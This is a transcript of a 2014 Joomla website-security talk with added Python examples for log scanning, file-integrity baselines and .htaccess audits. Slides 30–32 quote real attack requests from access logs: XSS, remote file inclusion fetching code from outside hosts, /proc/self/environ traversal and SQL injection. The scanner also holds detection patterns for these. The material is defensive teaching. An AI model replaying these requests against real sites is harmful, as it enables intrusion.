Joomla! Day Atlanta 2014 - Website Security - The Basics

There are many posts, links and sources on website security, yet we unfortunately overlook the basics as if they were somehow no longer important. The fact of the matter is that the basics will often save website owners a lot of headaches. This presentation goes back to the basics and provides a foundation from which all website owners, specifically Joomla ones, can build. Most of the concepts, though, apply across all platforms and are very platform agnostic.

For more information contact us at http://sucuri.net


  1. Joomla Website Security
  2. Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta | 4/4/2014
     - Organization: Sucuri, Inc.
     - Co-Founder, Chief Operating Officer
     - @sucuri_security, @perezbox
     - Specialization: Website Security, Incident Handling, Log Analysis
     - Special Interests: Working Out, Brazilian Jiu-Jitsu
  3.
     - Website Security Company
     - Global Operations
     - Platform Agnostic (i.e., Joomla, WordPress, etc.)
     - Scan 2M Unique Domains a Month
     - Block 4M web attacks a Month
     - Remediate 400 – 500 websites a day
     - Signature / Heuristic Based
     - 24/7 operations
  4. Trends, Threats, Defenses. SIMPLE RIGHT?
  5. (image-only slide)
  6. Malicious Links: 2011 vs. 2012 (chart)
  7. (image-only slide)
  8. Known Malware vs. Unknown Malware (chart)
  9. Not Infected vs. Infected (chart)
  10. Infection types (pie chart): values 26%, 19%, 16%, 14%, 11%, 4%, 10%; categories Remote iFrame Includes, Remote JavaScript Includes, SPAM Injections, Obfuscated / Encoded JavaScript, Conditional Redirects, Defacements, Other
  11. Apache, SSH, Email Server
     - Going deeper than the application layer, targeting the server.
     - Server Polymorphism – a.k.a. changes a lot
  12.
     - Stick With Reputable Sources
     - Generating SPAM emails, resource hogs
     - IP blacklisting
  13. (image-only slide)
  14. Pharmacy; Payday Loans
  15. Exploiting Access Control; Brute Force Attacks
  16. Site 1, Site 2, Site 3, Site 4 (diagram)
  17. (image-only slides 17–25)
  26. Explosion in the Malware as a Service (MaaS) trade
     - Yes, pay someone to hack for you
     - Different tools to break in and generate payloads
     - Brute force and vulnerability exploits
     - Malware Payloads
     - Blackhole Exploit Kit – Today's market leader (2013 – SophosLabs)
  27. (image-only slides 27–28)
  29. What kind of website do you have? Use for malware? Burrow into network? Steal data?
  30. Cross-site scripting attempts in access logs: Stored / Reflective
     38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
     123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
  31. File inclusion attempts in access logs (remote URLs passed to timthumb.php / thumb.php, and local traversal to /proc/self/environ):
     [02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
     83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
     82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
  32. SQL injection attempt in access logs:
     62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9"
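The log lines on slides 30 to 32 are what a site owner has to pick out of thousands of ordinary requests. The script below is an added example, not from the slides and not Sucuri's tooling: it parses combined-format access-log lines, URL-decodes the request path (twice, so one layer of double-encoding cannot hide a payload) and tags each line with the patterns the slides illustrate: script or event-handler injection, directory traversal to /proc/self/environ, a remote URL handed to a thumbnail script, and UNION SELECT. The rule names and regular expressions are my own assumptions, tuned to these lines rather than to a production rule set; the sample input is the slides' own lines plus one constructed benign Joomla request for contrast.

```python
import re
from urllib.parse import unquote_plus

# Sample input: the access-log lines quoted on slides 30-32 (trimmed where the
# slides trimmed them), plus one constructed benign request at the end.
SAMPLE_LOG = [
    '38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"',
    '123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268',
    '[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"',
    '83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"',
    '82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"',
    '62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9"',
    # Constructed benign Joomla article request; must produce no hits.
    '203.0.113.10 - - [03/Apr/2013:12:00:00 -0400] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

# Combined log format. The client/ident/user prefix is optional because one
# slide line was quoted without it.
LOG_RE = re.compile(
    r'^(?:(?P<ip>\S+) \S+ \S+ )?'
    r'\[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Detection rules (assumed names), applied to the decoded request path.
RULES = {
    "xss":  re.compile(r'</?\s*(?:script|img|iframe)\b|\bon(?:error|load|mouseover)\s*=', re.I),
    "lfi":  re.compile(r'(?:\.\./){3,}|/proc/self/environ|\x00', re.I),
    "rfi":  re.compile(r'[?&]\w*(?:src|url|file|page)=https?://', re.I),
    "sqli": re.compile(r'\bunion\s+(?:all\s+)?select\b', re.I),
}


def classify(line):
    """Parse one log line; return ip/status/path plus the list of rule names that
    matched (empty list when clean). Returns None for lines that do not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    decoded = m.group("path")
    for _ in range(2):  # two passes defeat a single layer of double-encoding
        decoded = unquote_plus(decoded)
    return {
        "ip": m.group("ip") or "-",
        "status": int(m.group("status")),
        "path": m.group("path"),
        "hits": [name for name, rx in RULES.items() if rx.search(decoded)],
    }


def scan(lines):
    """Return only the parsed entries that matched at least one rule, in log order."""
    return [e for e in map(classify, lines) if e and e["hits"]]


if __name__ == "__main__":
    for e in scan(SAMPLE_LOG):
        # A 200 on an inclusion or injection request deserves priority: the
        # server answered it rather than rejecting or redirecting.
        flag = "SERVED" if e["status"] == 200 else "      "
        print(f'{e["ip"]:>15} {e["status"]} {flag} {",".join(e["hits"]):5} {e["path"][:70]}')
```

The status code carried with each hit is the triage key: the two thumbnail requests and the UNION SELECT came back 200 with a body, so those need a look at the files and database, while the 302 and 404 lines are attempts that still belong in blocklists and brute-force counters.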
  33. (image-only slides 33–34)
  35. http://forum.joomla.org/viewtopic.php?t=795946
     - Autson Skitter Slideshow (mod_AutsonSlideShow): the malicious code is located in the "tmpl" folder, in the php file(s).
     - ShareThis for Joomla! (mod_JoomlaShareThis): the malicious code is located in mod_JoomlaShareThis.php.
     - VirtueMart Advanced Search (mod_virtuemart_advsearch): the malicious code is located in mod_virtuemart_advsearch.php.
     - AddThis For Joomla (mod_AddThisForJoomla): the malicious code is located in mod_AddThisForJoomla.php.
     - Plimun Nivo Slider (mod_PlimunNivoSlider): the malicious code is located in the "tmpl" folder, in the php file(s).
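Slide 35 lists extensions whose PHP files carried injected code, and slide 12's "Stick With Reputable Sources" is the prevention. The detection side is a file-integrity baseline: hash every PHP file under modules/ when the extension is installed from a known-good source, store the hashes, and diff later. The script below is an added example, not from the slides or from Sucuri; the directory layout and placeholder PHP bodies are constructed so it runs stand-alone, and the "tampering" it simulates is an appended comment plus an extra file, not real malicious code. One caveat the slide implies: if the copy you install is already backdoored, it will match its own baseline, so take the baseline from the vendor's official download, not from a package someone re-hosted.

```python
import hashlib
import json
import os
import tempfile


def hash_tree(root, exts=(".php",)):
    """Map each file under root with one of exts to its SHA-256, keyed by a
    forward-slash relative path so baselines are portable across hosts."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def save_baseline(digests, path):
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(digests, fh, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def diff_baseline(baseline, current):
    """Files that appeared, disappeared or changed content since the baseline."""
    base, cur = set(baseline), set(current)
    return {
        "added": sorted(cur - base),
        "removed": sorted(base - cur),
        "modified": sorted(p for p in base & cur if baseline[p] != current[p]),
    }


def build_demo():
    """Constructed modules/ tree with placeholder PHP (not the real extensions).
    Takes a baseline, then simulates what the forum thread describes: a tmpl
    PHP file changes and an unexpected PHP file appears. Returns (root, baseline_path)."""
    root = tempfile.mkdtemp(prefix="joomla-modules-")
    placeholders = {
        "mod_virtuemart_advsearch/mod_virtuemart_advsearch.php":
            "<?php defined('_JEXEC') or die;\necho 'advanced search';\n",
        "mod_AutsonSlideShow/mod_AutsonSlideShow.php":
            "<?php defined('_JEXEC') or die;\necho 'slideshow';\n",
        "mod_AutsonSlideShow/tmpl/default.php":
            "<?php defined('_JEXEC') or die;\necho '<div class=\"slides\"></div>';\n",
    }
    for rel, body in placeholders.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)

    baseline_path = os.path.join(root, "baseline.json")  # not .php, so never hashed
    save_baseline(hash_tree(root), baseline_path)

    # Constructed post-install changes standing in for injected code.
    with open(os.path.join(root, "mod_AutsonSlideShow/tmpl/default.php"), "a", encoding="utf-8") as fh:
        fh.write("// constructed change marker\n")
    with open(os.path.join(root, "mod_AutsonSlideShow/tmpl/helper.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php // constructed extra file\n")
    return root, baseline_path


if __name__ == "__main__":
    root, baseline_path = build_demo()
    report = diff_baseline(load_baseline(baseline_path), hash_tree(root))
    for kind, paths in report.items():
        for p in paths:
            print(f"{kind:9s} {p}")
```

In practice the baseline file lives outside the web root (an attacker who can write modules/ can also rewrite a baseline stored beside it), and the diff runs from cron or after every extension update, with the update itself being the one expected source of "modified" entries.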
  36.
     - Brand Reputation
     - Legal Implications
     - Impact to Sales
     - Blacklisted by Search Engines
     - Blacklisted by Payment processors
     - Worst Day Of your Life
  37. (image-only slide)
  38. Sucuri properties suffer:
     - ~125,000 web based attacks a month on average
     - ~4,000 attacks a day (this spikes on occasion)
     - Doesn't include server level attacks
     - All flavors of attacks
  39. Principles; Access Control; Vulnerabilities
  40. “It’s about risk reduction… risk will never be zero…”
  41. Defense in depth: “…a concept in which multiple layers of security controls (defenses) are placed throughout an information technology (IT) system. Its intent is to provide redundancy in the event a security control fails or a vulnerability is exploited…”
  42. Passwords: Complex – Long – Unique
  43. Least privilege: “requires that in a particular abstraction layer of a computing environment, every module (such as a process, a user or a program depending on the subject) must be able to access only the information and resources that are necessary for its legitimate purpose.”
  44. (image-only slide)
  45. PHP Execution, disable it in: Cache, Tmp, Modules, Components, Images
     http://blog.sucuri.net/2013/08/joomla-media-manager-attacks-in-the-wild.html
     <Files *.php>
     Deny from all
     </Files>
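The slide gives the Apache 2.2 directive; the following script is an added example (not from the slides or from Sucuri) that audits a Joomla install for it. For each directory the slide names it reports whether an .htaccess is present that denies direct requests to .php files, accepting both the slide's `Deny from all` and the Apache 2.4 `Require all denied` form. Two caveats worth knowing before trusting a "blocked" result: .htaccess files only take effect when the vhost's AllowOverride permits the directive, and nginx ignores them entirely. Blocking direct requests does not break modules or components, because Joomla loads their PHP through index.php includes rather than direct URLs; it only stops an uploaded file in those directories from being executed by name. The directory tree is constructed so the example runs stand-alone.

```python
import os
import re
import tempfile

# Directories named on the slide where direct PHP execution should be denied.
PROTECTED_DIRS = ["cache", "tmp", "modules", "components", "images"]

# The Apache 2.2 block quoted on the slide.
HTACCESS_22 = "<Files *.php>\nDeny from all\n</Files>\n"
# Apache 2.4 equivalent (assumption: mod_access_compat not loaded, so 2.2 syntax would error there).
HTACCESS_24 = "<Files *.php>\nRequire all denied\n</Files>\n"

_DENY = r'(?:Deny\s+from\s+all|Require\s+all\s+denied)'
DENY_PATTERNS = [
    re.compile(r'<Files\s+[^>]*\.php[^>]*>.*?' + _DENY + r'.*?</Files>', re.I | re.S),
    re.compile(r'<FilesMatch\s+"[^"]*php[^"]*">.*?' + _DENY + r'.*?</FilesMatch>', re.I | re.S),
]


def php_execution_blocked(htaccess_text):
    """True if the text contains a Files/FilesMatch block denying access to .php files."""
    return any(p.search(htaccess_text) for p in DENY_PATTERNS)


def audit(joomla_root):
    """Return {dir: 'blocked' | 'unprotected' | 'missing-dir'} for the slide's directories.
    A directory with no .htaccess, or one that does not deny .php, is 'unprotected'."""
    report = {}
    for d in PROTECTED_DIRS:
        path = os.path.join(joomla_root, d)
        if not os.path.isdir(path):
            report[d] = "missing-dir"
            continue
        text = ""
        ht = os.path.join(path, ".htaccess")
        if os.path.isfile(ht):
            with open(ht, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
        report[d] = "blocked" if php_execution_blocked(text) else "unprotected"
    return report


def build_demo_root():
    """Constructed Joomla-like tree: cache/ and images/ protected, tmp/ has an
    .htaccess that does not touch PHP, modules/ has none, components/ is absent."""
    root = tempfile.mkdtemp(prefix="joomla-demo-")
    for d in ["cache", "tmp", "modules", "images"]:
        os.makedirs(os.path.join(root, d))
    files = {
        "cache/.htaccess": HTACCESS_22,
        "images/.htaccess": HTACCESS_24,
        "tmp/.htaccess": "Options -Indexes\n",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for d, status in audit(build_demo_root()).items():
        print(f"{d:12s} {status}")
```

Run `audit("/path/to/joomla")` against a real install; anything other than "blocked" for an existing directory is a gap to close with the block quoted on the slide (or its 2.4 form).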
  46. (image-only slides 46–49)
  50.
     1. Fix index.php file and assume all is fine.
     2. Panic your way into Joomla! Forums after hack.
     3. Don’t worry about updating.
     4. Trust third-party extensions.
     5. Apply all upgrades on live site.
     6. Install and forget, all is well with your new site.
     7. Use the same username and password for everything.
     8. Don’t waste time making security adjustments to PHP and settings.
     9. No regular backups required.
     10. Use the cheapest host.
  51. Resources (Name: Tool)
     - Sucuri Blog: http://blog.sucuri.net
     - SucuriTV: http://sucuri.tv
     - Malware Scanner: http://sitecheck.sucuri.net
     - Malware Scanner: http://unmaskparasites.com
     - Badware Busters: https://badwarebusters.org
     - Google Forums: http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
     - Google Webmaster Tools: http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
     - Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress
     - Exploit-DB: http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
     - Joomla! Security and Performance FAQs: http://docs.joomla.org/Security_and_Performance_FAQs
     - Joomla! Security Checklist: http://docs.joomla.org/Security_Checklist/Getting_Started
  52. (image-only slide)
